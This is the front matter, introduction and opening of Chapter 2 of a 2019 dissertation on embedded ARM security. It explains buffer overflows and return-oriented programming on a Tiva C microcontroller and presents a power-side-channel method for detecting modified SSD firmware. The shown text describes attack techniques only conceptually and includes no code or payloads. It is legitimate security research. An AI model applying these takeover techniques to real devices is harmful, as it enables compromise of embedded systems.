Analysis of Security in Embedded ARM Environments

Dane A. Brown

Dissertation submitted to the Faculty of the Virginia Polytechnic Institute and State University in partial fulfillment of the requirements for the degree of

Doctor of Philosophy in Computer Engineering

T. Charles Clancy, Chair Ryan Gerdes Yaling Yang Jonathan Black Patrick Schaumont

August 13, 2019 Arlington, Virginia

Keywords: Security, Firmware, Embedded Devices, ARM 2019, Dane A. Brown Analysis of Firmware Security in Embedded ARM Environments Dane A. Brown (ABSTRACT)

Modern enterprise-grade systems with virtually unlimited resources have many options when it comes to implementing state of the art intrusion prevention and detection solutions. These solutions are costly in terms of energy, execution time, circuit board area, and capital. Sus- tainable devices and power-constrained embedded systems are thus forced to make suboptimal security trade-offs. One such trade-off is the design of architectures which prevent execution of injected shell code, yet have allowed Return Oriented Program- ming (ROP) to emerge as a more reliable way to execute malicious code following attacks. ROP is a method used to take over the execution of a program by causing the return address of a function to be modified through an exploit vector, then returning to small segments of otherwise innocuous code located in executable memory one after the other to carry out the attacker’s aims. We show that the Tiva TM4C123GH6PM , which utilizes an ARM Cortex-M4F processor, can be fully controlled with this technique. Firmware code is pre-loaded into a ROM on Tiva which can be subverted to erase and rewrite the where the program resides. That same firmware is searched for a Turing- complete gadget set which allows for arbitrary execution. We then design and evaluate a method for verifying the integrity of firmware on embedded systems, in this case Solid State Drives (SSDs). Some manufacturers make firmware updates available, but their proprietary protections leave end users unable to verify the authenticity of the firmware post installa- tion. This means that attackers who are able to get a malicious firmware version installed on a victim SSD are able to operate with full impunity, as the owner will have no tools for detection. We have devised a method for performing side channel analysis of the current drawn by an SSD, which can compare its behavior while running genuine firmware against its behavior when running modified firmware. We train a binary classifier with samples of both versions and are able to consistently discriminate between genuine firmware and modified firmware, even despite changes in external factors such as temperature and supplied power. Analysis of Firmware Security in Embedded ARM Environments Dane A. Brown (GENERAL AUDIENCE ABSTRACT)

To most consumers and enterprises, a computer is the desktop or laptop device they use to run applications or write reports. Security for these computers has been a top priority since the advent of the Internet and the security landscape has matured considerably since that time. Yet, these consumer-facing computers are outnumbered several times over by embedded computers and microcontrollers which power ubiquitous systems in industrial control, home automation, and the Internet of Things. Unfortunately, the security landscape for these embedded systems is in relative infancy. Security controls designed for consumer and enterprise computers are often poorly suited for due to constraints such as power, memory, processing, and real-time performance demands. This research considers the unique constraints of embedded systems and analyzes their security in a practical way. We begin by exploring the mechanism and extent to which a device can be compromised. We show that a technique known as Return Oriented Programming (ROP) can be used to bypass some of the process control protections in place and that there can be enough existing code in the firmware to allow an attacker to execute code at will. This leads naturally to the question of how embedded computers can be secured. One important security assurance is the knowledge that a device is running legitimate firmware. This can be difficult for a device owner to verify due to proprietary protections put in place by manufacturers. However, we contribute a method to detect modifications to firmware on embedded systems, particularly Solid State Drives. This is done through an analysis of the current drawn during drive operations with best-practice data classification techniques. The findings of this research indicate that current embedded devices present a larger surface area for attack, less sophistication required for attack, and a larger quantity of devices vulnerable to attack. Even though these findings should raise concern, we also found that there are practical methods for detecting attack via monitoring and analysis. Dedication

I dedicate this work to my wife, Jennifer, my daughter, Elliana, my son, Edison, and my mother, Roberta. Jennifer has sacrificed her time and goals selflessly as I have pursued this Ph.D. My children have been my biggest cheerleaders and have always been there to lift my spirits. My mother has been a constant source of support, whether I needed childcare or just a word of encouragement. I am eternally grateful to my family for their love and support. Finally, I dedicate this work to my God above for giving me the determination and stamina to complete this process in the midst of several demanding life obligations.

i Acknowledgments

I would like to first acknowledge my committee chair, Dr T. Charles Clancy, for his guidance throughout this daunting process. I also acknowledge the constructive criticism and outside perspectives offered by the rest of my committee: Dr. Ryan Gerdes, Dr. Yaling Yang, Dr. Patrick Schaumont, and Dr. Jonathan Black. I need to acknowledge those who helped me perform the research, starting with Dr. Nathanael Weidler who was my chief collaborator on Return Oriented Programming work. I also need to thank my research group at the U.S. Naval Academy, the Computer Engineering and Cyber Security Research group (CECSR), in particular Dr. T. Owens Walker, Dr. Robert Ives, Dr. Justin Blanco, and Dr. Ryan Rakvic worked very closely with me to plan, collect, and analyze data for the Solid State Drive research. Finally, I would like to thank the students and interns who volunteered their time to assist me in data collection and script writing: Midshipman Rupam Mondal, Ensign Zachary Johnson, Mr. Bernie Cieplak, Mr. Ryan McDowell, and Mr. Tsegazeab Beteselassie.

ii Contents

List of Figures vii

List of Tables xi

1 Introduction 1

1.1 Vulnerability of Embedded Systems ...... 3

1.2 Ubiquitous Microcontrollers ...... 4

1.2.1 Rapid Prototyping of Inexpensive Devices ...... 5

1.2.2 Internet of Things ...... 5

1.3 Review of Security Analysis Techniques ...... 6

1.3.1 Buffer Overflow Attacks ...... 6

1.3.2 Return Oriented Programming ...... 7

1.3.3 Side Channel Analysis ...... 8

1.3.4 Data Classification ...... 8

1.4 Thesis Statement and Research Questions ...... 9

1.5 Contributions ...... 10

1.5.1 Return Oriented Programming Contributions ...... 11

1.5.2 Detection of Modified Firmware Contributions ...... 12

iii 1.6 Organization of the Dissertation ...... 13

2 Return Oriented Programming on Embedded Firmware 15

2.1 Microcontroller Security ...... 15

2.1.1 Security versus Sustainability ...... 16

2.1.2 Related Work ...... 18

2.1.3 Thumb Instruction Set ...... 19

2.1.4 Threat Model ...... 19

2.2 Return-Oriented Programming on ARM Architectures ...... 20

2.3 Erasing and Programming Flash Memory ...... 24

2.3.1 Finding Gadgets ...... 25

2.3.2 Reprogramming Method ...... 26

2.3.3 Demonstration of Writing a Simple Program to Flash ...... 29

2.3.4 Second Gadget Set ...... 31

2.4 Turing-complete Gadget Set ...... 34

2.4.1 Requirement ...... 37

2.4.2 Gadgets from the Tiva C ...... 37

2.5 Experimental Results ...... 49

3 Security Analysis of Solid State Drive Firmware 58

3.1 Solid State Drive Security ...... 58

iv 3.2 Related Work ...... 59

3.3 Jasmine Flash Translation Layers ...... 62

3.4 Threat Model ...... 64

3.4.1 Ownership Trust Boundary ...... 64

3.4.2 Internet Trust Boundary ...... 67

3.4.3 Physical Trust Boundary ...... 67

3.4.4 Threat Model Review ...... 68

3.5 Malicious Code Injection ...... 68

3.5.1 Denying Garbage Collection ...... 69

3.5.2 Formatting NAND Flash ...... 70

3.5.3 Clearing DRAM Buffers ...... 71

4 Detection of Modified Firmware on Solid State Drives 73

4.1 Detecting Modified Firmware ...... 73

4.1.1 Data Collection Setup ...... 73

4.1.2 Data Processing ...... 74

4.1.3 Firmware Binary Classifier ...... 78

4.2 Classifying Different Levels of Modification ...... 83

4.3 Classifying at Different Temperatures ...... 86

4.4 Classifying with Different Power Supplies ...... 92

v 4.5 Classifying in Dynamic Conditions ...... 96

5 Conclusions 98

5.1 Future Work ...... 100

5.2 Closing ...... 101

Bibliography 103

Appendices 116

Appendix A Modified FTL Code - Clearing DRAM 117

vi List of Figures

2.1 Example of using a pop pc as a return...... 21

2.2 Stack Diagram - bx lr Return...... 23

2.3 Stack Diagram - move...... 38

2.4 Stack Diagram - load...... 39

2.5 Stack Diagram - load immediate...... 40

2.6 Stack Diagram - store...... 40

2.7 Stack Diagram - add...... 41

2.8 Stack Diagram - subtract...... 42

2.9 Stack Diagram - and...... 44

2.10 Stack Diagram - 0r...... 44

2.11 Stack Diagram - conditional branch...... 45

2.12 Stack Diagram - set less than...... 46

2.13 Delay Loop...... 48

2.14 Stack Diagram - xor...... 49

2.15 Move. The value contained in r4 moved to r0...... 50

vii 2.16 Load. The value 0xDEADBEEF from memory location 0x020000FA4 to r0. Note that the stack pointer shows the bottom of the stack as 0x20000FC4 before execution begins...... 51

2.17 Load Immediate. The value 0xDEADBEEF is popped from the stack into r4 and then moved to r0...... 51

2.18 Store. The value 0xDEADBEEF is taken from the stack, placed in r0 and then written to memory location 0x20000FA8 which is 12 plus 0x20000F9C. ... 52

2.19 Add. The values 0x02020202 and 0x03030303 from the stack are added together and the result, 0x05050505, is placed in r1...... 52

2.20 Sub. The value 0x02020202 is subtracted from 0x03030303 (both values are found on the stack) and the result, 0x01010101, is placed in r0...... 53

2.21 And. The value 0x11111111 is placed in r3 and anded with the value, 0x76767676 already in r2. The result, 0x10101010 finishes in r2...... 53

2.22 Or. The two values 0xAAAAAAAA and 0xCCCCCCCC are taken from the stack and ored with each other. 0xEEEEEEEE is the result of that operation and it is placed in r0...... 54

2.23 Conditional Branch. The value 0x00000001 is placed in r2 which indicates to branch to the location found at memory location 0x20001010. If any other value besides 0x00000001 was placed in r2, the branch to the address located at 0x2000100C would have been followed...... 55

viii 2.24 Set Less Than. The values 0x00000005 and 0x00000007 are tested. As the first value is less than the second a 0x00000001 is placed in r0. If the first value was not less than the second value, a 0x00000000 would have been placed in r0...... 56

2.25 Delay Loop. 0x00000000 is initially loaded into r5 and 0x00000009 is loaded into r3. r5 is incremented until it equals r3 and then the loop finishes. The final value of 0x00000009 can be seen in both r5 and r3...... 57

3.1 OpenSSD project Jasmine development board [66] ...... 63

3.2 Threat Model of potential modifications to an SSD...... 65

3.3 Current over time comparison of Greedy and Garbage Collection Modified Greedy firmware ...... 70

3.4 Unmodified (red crosses) and Garbage Collection modified (blue circles) firmware observations plotted in the space of the first three principal components used in classification...... 71

3.5 Current over time comparison of Greedy and Greedy-50% firmware in [24]. . 72

4.1 The laboratory setup to write data to the SSD and measure current draw .. 74

4.2 Pre-processing Stage for a Single Current Recording...... 79

4.3 Processing Stage for a Batch of Current Recordings...... 81

4.4 Scatter plot of first 3 Principal Components for unmodified Greedy vs. Greedy- 50% firmware at 50C...... 82

4.5 Current over time comparison between Greedy and Greedy-100% firmware. . 85

ix 4.6 Classifier performance vs. Greedy-X% ...... 87

4.7 Top view of Jasmine board set up for temperature data collection...... 88

4.8 Bottom view of Jasmine board with heating pad placement...... 89

4.9 Temperature settings compared to actual temperatures observed during a trial. 90

4.10 Current over time comparison between Greedy and Greedy-50% firmware both at 45C...... 91

4.11 Classifier performance vs. temperature (classifies Greedy and Greedy-50%). 93

4.12 Current over time comparison between Greedy and Greedy-50% firmware both using an external power supply...... 94

4.13 Robustness of Binary Classifiers with Power Supply changes (classifies Greedy and Greedy-50%). For each classifier (LR, QDA, kNN), accuracy bars are for the Internal Seasonic (left), External Dynapower (middle), and External EVGA (right) power supplies...... 95

4.14 QDA classifier performance trained and tested at each temperature...... 96

4.15 QDA classifier performance trained and tested with each power supply. ... 97

x List of Tables

2.1 The ROP design...... 32

4.1 Accuracy of Binary Classifiers (% Modification of Firmware) ...... 86

4.2 Robustness of Binary Classifiers with Temperature Variation (with 50% Prob- ability of Modification) ...... 92

4.3 Robustness of Binary Classifiers with Power Supply (with 50% Probability of Modification) ...... 95

xi List of Abbreviations

APT Advanced Persistent Threat

ARM Advanced RISC Machine

DRAM Dynamic Random Access Memory

FTL Flash Translation Layer

GPIO General Purpose Input/Output

HDD Hard Disk Drive

IoT Internet of Things k-NN k Nearest Neighbors

LR Logistic Regression

MMU Memory Management Unit

MPU Memory Protection Unit

PCA Principal Component Analysis

POS Point of Sale

PSU Power Supply Unit

QDA Quadratic Discriminant Analysis

ROM Read Only Memory

xii ROP Return Oriented Programming

SATA Serial Advanced Technology Attachment

SCADA Supervisory Control and Data Acquisition

SSD Solid State Drive

TEE Trusted Execution Environment

UART Universal Asynchronous Receiver/Transmitter

xiii Chapter 1

Introduction

Embedded devices are emerging as key players on the security battlefield, both as targets and as weapons.

In order to cause deliberate, physical damage to an Iranian nuclear enrichment plant, the most sophisticated worm of its time, named Stuxnet, was created and released. This worm specifically sought out Supervisory Control and Data Acquisition (SCADA) systems that would be attached to vulnerable embedded Siemens controllers. These controllers were responsible for the speed at which the centrifuges would operate, and malicious code would cause them to operate at dangerous speeds with no digital indication to plan operators[59]. There were some interesting aspects to this attack that were not frequently implemented against embedded devices. For example, there were four zero day exploits (exploits for which no patch exists) used to ensure the exploits had the highest chance of infection. Also, Stuxnet code was released remotely, not just from outside of the enrichment plant, but from outside of Iran, and had to cross an air gap (a zone with no network connection) to land inside the plant. This was done by spreading the worm via USB drives. When a USB drive was plugged into a computer infected with Stuxnet, it would store a copy of the worm to pass on to future systems into which the drive would be inserted. Once one of these drives was connected to a system within the enrichment plant, the worm bypassed the air gap[61]. This case is significant because it shows significant attack resources being directed at the code running an embedded system. This particular embedded controller was a valuable target

1 2 Chapter 1. Introduction because, like many embedded devices, it was in control of a physical system where changes to the code could have tangible real-world effects.

Target is one of the most successful retail businesses in the United States. They had the staff and resources in place to provide strong defenses for their systems and networks. They also had a malware detection system installed specifically to detect potential data breaches. Yet, with all of these measures in place, they still suffered one of the largest data breaches in history. Despite their state-of-the-art defense, Target did not properly limit access to third party service providers [76]. When credentials were compromised from a company responsible for their climate control, Target allowed the attacker to use these credentials to move laterally within their network and eventually compromise their Point of Sale (POS) systems. These are the embedded systems at every checkout register where customers swipe their credit cards to pay for purchased items. With this POS malware in place, the attackers were able to exfiltrate unprecedented amounts of credit card data [67]. This particular incident is important as it highlights an embedded system, the POS device, as the focus of this significant data breach of sensitive financial information.

Bloomberg Businessweek published findings suggesting that Chinese agents were able to insert a backdoor into computer parts sold by an American company, Super Micro Computer Inc. (Supermicro) [77]. It was alleged that a small microchip was implanted onto server motherboards which could create a stealthy entry point for remote attackers into any network containing an altered system. This could have far-reaching impacts as Supermicro products were reported to be deployed by some of the largest American technology firms including Apple and Amazon. The significance of this report lies in the stealth factor of the alleged implant. The alleged microchip was ”not much bigger than a grain of rice” and unlikely to be detected by any routine quality assurance procedures. Further, this incident is significant because it describes a realistic scenario where an embedded device is used as a weapon to 1.1. Vulnerability of Embedded Systems 3 compromise a connected system. Though this particular incident has been the subject of ongoing debate, the realization that this threat vector could undermine trust in systems once assumed to be secure meant that there would need to be significant advancement in the security of circuit boards [58] or in the ability to detect modifications when they occur [41].

These case studies reinforce the relevance of embedded systems to the security of an indi- vidual, a company, or a nation. The goal of this research is to empower end users with tools and methods to assess the security of their embedded devices. We first create a method which advances the state-of-the-art in vulnerability assessment by utilizing Return Oriented Programming (ROP) to hijack control flow of a system which would not be susceptible to a buffer overflow alone. We introduce a novel ROP gadget technique and demonstrate for the first time that a Turing-complete code execution is possible through just the firmware dis- tributed with an Advanced RISC Machine (ARM) architecture embedded system. Second, we devise a capability which advances the state-of-the-art in detecting potentially malicious firmware executing on an ARM architecture embedded device. We collect measurements of current drawn during device operation with both the modified firmware and the genuine firmware. These data are input for three different classifiers which all are able to distinguish these firmware variants with very high accuracy.

1.1 Vulnerability of Embedded Systems

Embedded systems have typically been custom designed as simplified systems that perform a task in an optimal way for a specific application. That optimization may come in the form of power consumption, speed, size, cost, or any number of other specifications. The embedded system may be a simple stand-alone device, or part of a larger and more complex machine [92]. Whereas embedded system design was once considered a long and expensive 4 Chapter 1. Introduction process, it is now possible - and commonplace - to use commodity hardware and implement embedded applications in a firmware or even a software layer.

This research addresses some of the problems and potential solutions for modern embedded systems. The rest of this chapter will introduce details about the landscape of embedded computing systems that leave them in their currently vulnerable state. These details include the prevalence of microcontrollers, the pace of development, the Internet of Things, and techniques for assessing device security.

1.2 Ubiquitous Microcontrollers

One report estimates that the number of microcontrollers, which are at the heart of mod- ern embedded devices, will be 50 billion by 2019 [48]. While researchers and enterprises are becoming increasingly concerned about the security of data and communications in IoT devices, the majority of embedded systems will be non-IoT devices whose security risks can pose just as much danger (examples include digital cameras, 3-D printers, point-of-sale systems, and disk storage devices). Many versions of these products do not even contain networking capabilities, yet their operation makes it necessary to connect to a computer for initial configuration, data collection, or updates. This provides a window of opportunity for the networked computer to infect the embedded device or vice versa. The high level of implicit trust for these embedded systems which possess no inherent network functionality combined with the lack of impetus to secure them makes such devices an ideal vector for opportunistic exploitation. Until there is widespread recognition of this threat and appli- cation of appropriate security controls and monitoring for all embedded devices, end users will have to take responsibility for detecting and mitigating compromises of their embedded systems. 1.2. Ubiquitous Microcontrollers 5

1.2.1 Rapid Prototyping of Inexpensive Devices

There is probably no better example of the rapid prototyping of embedded devices at the maker and hobbyist level than the 2012 introduction of the for only 35 U.S. dollars, which has since lowered to only 5 U.S. dollars with the Raspberry Pi Zero introduced in late 2015 [74]. We have also seen many other microcontroller development boards grow in popularity over the same time frame, examples include: the Arduino, the Beaglebone, the Mbed, and the Tiva C from Texas Instruments which is one of the subjects of this research. These devices are lowering the bar to commercial entry and allowing new, immature businesses to spawn and release new embedded devices or adaptations of existing devices without a rigorous development and testing pipeline. The result is an over-abundance of poorly tested, vulnerable products being purchased by consumers who are unaware of the security shortcomings.

1.2.2 Internet of Things

This trend of widespread access to embedded device production has had far-reaching impacts. It has enabled the Internet of Things (IoT) phenomenon, the connection of many devices to the Internet that were originally designed to be self-contained. It is estimated that there will be 20 billion IoT devices by 2020 [53]. Unfortunately, the first generation of these devices came with insufficient security design and controls. Customers are frequently being alerted to the inherent and newly discovered risks. Researchers and the IoT industry are now scrambling to create solutions that bring IoT security on par with that of more mature general purpose personal computers. 6 Chapter 1. Introduction

1.3 Review of Security Analysis Techniques

This section introduces the main techniques used to conduct this research. It begins with a discussion of a classic exploitation technique, the buffer overflow, then of its modern day successor, Return Oriented Programming. It concludes with an introduction to Side Channel Analysis, and the data analysis techniques used to create a classifier.

1.3.1 Buffer Overflow Attacks

The buffer overflow attack has been a go-to intrusion technique since it was fully described in Phrack magazine [72] over two decades ago. In its most basic form, a buffer overflow takes advantage of an oversight in software that allows an entity which inserts data into a buffer to make that buffer longer than the space originally allocated to it. The extra space that buffer now consumes was likely previously used to hold other data. The problem is that other segments of the code will still expect to find certain data at the same location where it has been overwritten by the oversized buffer.

In most cases, a buffer overflow just causes unpredictable behavior and may even cause a program - or entire - to crash. In the most fruitful cases for an attacker, they make be able to write meaningful data in places that are later referenced by the running process. Consider a basic example where the overwritten data lies in an accounting process and references a bank account balance. The attacker would be able to artificially inflate their own balance or wipe out the savings of another patron.

A final example shows the power of a buffer flow to not only exploit a vulnerability but to also execute arbitrary code. Consider that the buffer overflow extends beyond the stack frame of the current function and is able to overwrite the return address to the calling function. 1.3. Review of Security Analysis Techniques 7

This would allow the attacker to insert an arbitrary address where execution will continue. Furthermore, the bytes of data the attacker has written onto the stack could contain valid byte code in the machine language of the target machine. If the return address chosen points to their own buffer containing this code, the attacker is able to fully take control of the execution of that process.

1.3.2 Return Oriented Programming

The concept of return-oriented programming (ROP) was first introduced for processors in 2007 by Hovav Shacham [82]. The motivation for this work was the memory policy of “write xor execute.” This policy specified that system memory regions could either be written to or executable, but not both. Typically, the region of memory which contains the stack and the heap would be set to be writable but not executable [8] and, during process execution, regions of memory containing code would be executable but no longer writable. This prevents code execution following basic buffer overflow attacks such as those outlined in the classic work, “Smashing the Stack for Fun and Profit” [72]. With ROP, the same technique is used to overflow a buffer, but instead of actually inserting instructions onto the stack, addresses and constants are placed on it. These addresses point to special segments of code and the constants are used by that code. These special segments of code are called gadgets. The main difference between code injection and ROP is that gadgets used in ROP are already somewhere in memory, there is no new code being introduced into the system. The attacker only needs to know the address of the gadget in order to force the processor to execute the instructions of the gadget at a time when it wasn’t meant to be executed. The constant values on the stack are values that the gadgets use, for example a gadget might load a value off the stack into a specific register. 8 Chapter 1. Introduction

Gadgets are short sequences of instructions that in the x86 world always end with a return instruction. The short sequence of code is meant to do a small amount of work towards the attacker’s goal and then the return instruction transfers program control to the next address on the stack, where the attacker has placed a subsequent gadget. In this way the attacker can carry out their nefarious purpose by piecing together snippets of executable code that already exist in the program’s memory. The attacker uses the program’s own code to carry out the attack. The beauty of this method is that it circumvents the “write xor execute” memory policy. This memory policy has been defeated elsewhere as well [69].

The original ROP work [82] has been extended to many platforms. It was extended to SPARC, a fixed instruction length RISC architecture by Buchanan et al[25]. Checkoway extended it to not require return instructions [30].

1.3.3 Side Channel Analysis

Side Channel Analysis is a process by which information about a system can be gleaned by passively observing its operations. This is in contrast to having full information about a system, such as a schematic, its code, or a debugging interface. In Side Channel Analysis, one must measure one or more parameters of a system during operation and compare those measurements to known data or make inferences. Common techniques include: timing anal- ysis, power analysis, electromagnetic analysis, fault analysis, and cache analysis. This work focuses on measuring power consumption during operations via current draw.

1.3.4 Data Classification

The purpose of collecting data from SSDs in this project is to be able to distinguish original firmware from modified firmware by its operating characteristics. This requires a consistent 1.4. Thesis Statement and Research Questions 9 setup to collect data in each class as well as assurances that there is a measurable change between the classes of data and that difference is captured during the collection. The col- lected data must then be converted to the frequency domain where the set of key features can be determined. At this point an analysis of similarity or difference can be conducted between all the training data points which produce the criteria for follow-on classification of test data. The particular classification techniques used in this project are described in detail in sections 4.1.2 and 4.1.3.

1.4 Thesis Statement and Research Questions

The state of system security research has advanced rapidly in recent decades on both the attack and defense sides. Skilled and determined attackers, known as Advanced Persistent Threats (APTs), have more tools at their disposal than ever before, yet systems have become hardened over the years and it now takes more skill to compromise them than in previous years. Unfortunately, these security controls have not been applied uniformly to all systems. Embedded devices are often legacy systems designed in an era with less security attention and expertise, or they are developed by inexperienced designers who lack awareness of se- curity best practices, or they are developed with heavy constraints on resources such that some security best practices are not followed. This lack of security combined with the fact that embedded systems outnumber general purpose computers several times over and the increasing trend of embedded devices becoming networked and joining the IoT, it is clear that embedded system security needs to be a high research priority.

The goal of this research is to identify current weaknesses in ARM architecture based em- bedded firmware and to demonstrate a method for verifying the integrity of manufacturer- provided firmware. 10 Chapter 1. Introduction

The following questions are addressed:

• Can mitigations to buffer overflow attacks be bypassed on embedded devices to execute arbitrary code?

• Can one feasibly expect to find a Turing complete set of Return Oriented Programming Gadgets in the provided firmware of an embedded device?

• Are resource constrained embedded systems adequately hardened against remote ex- ploitation?

• Can the operations of Solid State Drives be inferred via side channel analysis via power consumption?

• Can consumers characterize the firmware running on Solid State Drives and determine if it is authentic?

• Can a classifier of potentially malicious embedded system firmware be flexible and practical?

1.5 Contributions

The following section explains the contributions that will be submitted to both the field of Return Oriented Programming and the field of Side Channel Analysis as applied to embedded devices. 1.5. Contributions 11

1.5.1 Return Oriented Programming Contributions

Chapter 2 describes a microcontroller with a built-in code base and methods of compromising the control flow of this system. The main goals of this work are to demonstrate:

1. The ability to create a gadget set capable of erasing flash memory. This is the first step in taking control of a microcontroller and could also result in a denial of service.

2. The ability to create a gadget set capable of programming the region of flash memory that was previously erased. This is the second step in taking control of a microcon- troller.

3. The ability to create a Turing-complete gadget set from the TivaWare ROM. This allows for arbitrary code execution with ROP.

4. That modern energy-efficient embedded devices lack sufficient security assurances for mission-critical applications.

The contributions of this chapter are as follows: It is shown that an ARM Cortex-M4F processor using the Thumb-2 instruction set can be forced to execute arbitrary code. Specif- ically, the processor of the Texas Instruments Tiva TM4C123GH6PM microcontroller is attacked and the results shared. Even a simple program loaded into main memory is suffi- cient to locate enough gadgets to carry out an attack. A small code base is vulnerable to many exploits.

We further show that the Tiva microcontrollers are particularly vulnerable because large portions of code, even code that may never be executed, is made available in the Read Only Memory (ROM) of the microcontroller. Included on this ROM are libraries which make interacting with peripherals such as a Universal Asynchronous Receiver/Transmitter 12 Chapter 1. Introduction

(UART), General Purpose Input/Output (GPIO) and Ethernet controller easy. This code base is a treasure trove of potential gadgets to the attacker who has learned the technique of ROP. It is believed that the practice of loading this ROM with unnecessary code weakens the security of the microcontroller. The ROM is not, however, necessary to locate enough gadgets to carry out an attack.

Two sets of gadgets are shown, one taken from an example program in main memory and a second taken from the ROM. Buffer overflow techniques combined with ROP makes this microcontroller an easy target for malicious attacks.

In addition to the above contributions, a novel gadget that loads the link register with the

address of a pop of the program counter is discussed. A technique using this gadget which is similar to the update-load-branch [30] model is introduced.

This solution is simpler than the update-load-branch technique. A Turing-complete gadget set is also included. The search space for the gadget sets described below is restricted to the peripheral drivers loaded on the ROM of the Tiva C. Any program from main memory may be used to create a Turing-complete gadget set, if the appropriate gadgets can be located. The ROM was used here as an example as it ships pre-loaded on every Tiva C.

A novel gadget-chaining mechanism is set forth as well. We finally demonstrate the ability to manipulate the stack pointer which allows for efficient loops.

1.5.2 Detection of Modified Firmware Contributions

Chapter 4 describes a method of recording power data as an SSD operates and classifying whether the running firmware is authentic or modified based on its power signature. To properly secure SSDs, there must be systems in place to prevent and detect compromise, much like firewalls and anti-virus software do for host systems. Unfortunately, it is difficult 1.6. Organization of the Dissertation 13 for researchers to analyze SSD firmware to create protection and detection mechanisms because manufacturers treat it as intellectual property, tightly restricting access to and debugging tools. To overcome these obstacles, researchers must resort to reverse engineering SSD hardware and firmware or analyzing their behavior through a side channel. Chapter 4 attempts to motivate research towards security of embedded devices by describing a method of performing side channel analysis of current draw from an SSD to classify the firmware it is running. To this end, it offers the following contributions:

1. Develops a collection technique leveraging ground truth data generated from modifica- tions to open source SSD firmware that can potentially be extended to the side channel analysis of proprietary firmware.

2. Demonstrates a method designed to facilitate classification of potentially modified firmware.

3. Demonstrates that a classifier of firmware can be resilient to changes in its environment such as temperature.

4. Demonstrates that a firmware classifier can be resilient to hardware configuration changes such as the power supply.

5. Develops a threat model to assist manufacturers and end users in assessing risk to SSD firmware

1.6 Organization of the Dissertation

Chapter 2 gives and introduction to the modern flow control technique of Return Oriented Programming and describes its utility as part of an attack. It goes on to describe how 14 Chapter 1. Introduction this technique can execute malicious payloads, such as erasing and reprogramming flash memory(Section 2.3) or executing arbitrary code through the discovery of a Turing complete set of gadgets(Section 2.4).

Chapter 3 introduces the Solid State Drive as a proprietary appliance for which the user has no means to verify that security requirements are being met or to determine whether the device has been compromised. It describes an open source SSD firmware implementa- tion(Section 3.3) and a threat model for attacks on firmware integrity(Section 3.4). Sec- tion 3.5 demonstrates potential malicious modifications to SSD firmware.

Chapter 4 discusses the process for collecting modified firmware current draw data and classifying it apart from the original firmware(Section 4.1). It then tests the robustness of the classifier by testing it against different levels of modification(Section 4.2), modifications at different temperatures(Section 4.3), and modifications while connected to different power supplies(Section 4.4).

Chapter 5 summarizes the dissertation and motivates potential future work. The Appendix includes the modified version of Solid State Drive (SSD) firmware that was used to collect current draw data and compare to the original version. Chapter 2

Return Oriented Programming on Embedded Firmware

This chapter is adapted from work in [94].

2.1 Microcontroller Security

Energy-efficient microcontrollers are becoming increasingly important as the Internet of Things and the Internet of Everything become a real part of life. Everything from wearables to remote sensors become more feasible when they consume less power making them less expensive to operate. In the case of battery-operated devices they will last longer to allow them to fulfill their mission for longer periods of time. The Tiva TM4C123GH6PM (Tiva C) is advertised as a microntroller capable of supporting applications such as low power and hand-held smart devices [88].

The Tiva C makes use of an Advanced Reduced Instruction Set Computing (RISC) Machine (ARM) Cortex-M4F microprocessor. ARM advertises this as a low-power, low cost solution. The Cortex-M4 processor has been developed for a broad range of embedded markets in- cluding automotive control systems, building automation, connective clothing, the energy grid, wearables, medical instrumentation, household appliances, and space applications just to name a few [6]. ARM claims that tens of billions of ARM Cortex-M processors have

15 16 Chapter 2. Return Oriented Programming on Embedded Firmware

already been shipped [6]. With these devices widely deployed in safety-critical products, their security is vital.

The Tiva C includes the Cortex-M4F microprocessor [88], adding memory and the ability to interact with peripherals such as a Universal Asynchronous Receiver/Transmitter (UART), General-Purpose Input/Output (GPIO), and Ethernet controller [89]. It is important for the manufacturers of microprocessors and microcontrollers to have security in mind when they design these devices. Attackers would be able to wreak havoc on individuals and industries if they were able to exploit vulnerabilities in these systems for their own pernicious purposes. We have discovered that a Cortex-M4F microprocessor on a Tiva TM4C123GH6PM micro- controller can be forced to execute arbitrary code by means of Return-Oriented Programming (ROP).

2.1.1 Security versus Sustainability

The ability to secure systems has made impressive strides in recent years. End users who purchase top-of-the-line systems, configure them properly, and patch regularly can have reasonably high levels of assurance that their devices are protected from all but the most persistent and well-resourced attackers. Methods to detect and prevent buffer overflow at- tacks are commonplace [16, 38, 40] and similar defenses against ROP are beginning to be implemented in production systems [32, 47, 73]. Unfortunately, these protections are not extended to low-power embedded devices as the overhead to implement them is generally incompatible with green computing goals [15]. As a result, security for green embedded and IoT devices is frequently off-loaded and handled external to the device, if at all. Specifi- cally, external systems look for evidence of tampering either in network communications [62] or via side channel analysis [93]. Neither of these methods is effective at preventing local 2.1. Microcontroller Security 17 compromise or corruption in a device.

This research studies the case of the ARM Cortex-M4F in the Tiva C microcontroller. ARM specifies three families of processors: Cortex-A, Cortex-R, and Cortex-M. The Cortex-M family is specifically tailored for embedded system development [6], so any entity imple- menting a green device with the ARM architecture will do so using the Cortex-M family. Even though the Cortex-M4F is ideal for green applications, it is not ideal for security. The only applicable security feature is its Memory Protection Unit (MPU) [17]. The MPU allows a developer to specify granular constraints for reading, writing, and executing various mem- ory regions which may be useful in preventing execution of malicious code injected into a data area, but is not effective at stopping ROP which adds addresses - not code - to writable areas and only executes existing code from executable areas.

ARM does have stronger protections in place in its Cortex-A family. Cortex-A processors are intended to deliver good performance for general purpose applications, but this prioriti- zation of performance comes at the expense of energy-efficiency. While the Cortex-A is not ideal for green applications, it is the best ARM family for secure computing as it includes a full-featured Memory Management Unit (MMU) and the ARM Trust Zone [1]. The MMU handles virtual to physical address translation, extended permissions checking capability, execute never specification, and a non-secure bit. ARM Trust Zone creates a Trusted Ex- ecution Environment (TEE) in hardware which causes access to trusted applications and resources to cross a trust boundary with additional scrutiny and verification.

While clearly desirable, the security features of the Cortex-A family have not been feasible to implement on energy-efficient processors like the Cortex-M4F. ARM claims that the new Cortex-M23 specification will be the best of both worlds. Announced in late 2016, the Cortex-M23 and Cortex-M33 will be the first cores in the Cortex-M family with Trust Zone hardware protection built-in [3]. Of the two, the Cortex-M23 will be specially geared towards 18 Chapter 2. Return Oriented Programming on Embedded Firmware

energy-efficiency while still providing Trust Zone security assurances. However, as of this writing, no chips or development boards have yet been available with a Cortex-M23 processor and the only public implementation is an IoT FPGA image for the Cortex-M Prototyping System, MPS2+.

2.1.2 Related Work

A topic of research that is related to this work but not included is protecting a system from buffer overflow. This has been extensively researched by others [16, 39, 40, 60]. To counter that effort, several works have been dedicated to bypassing stack protections. Buffer overflows and bypassing stack protections will not be discussed here as they have been extensively discussed elsewhere [26, 44].

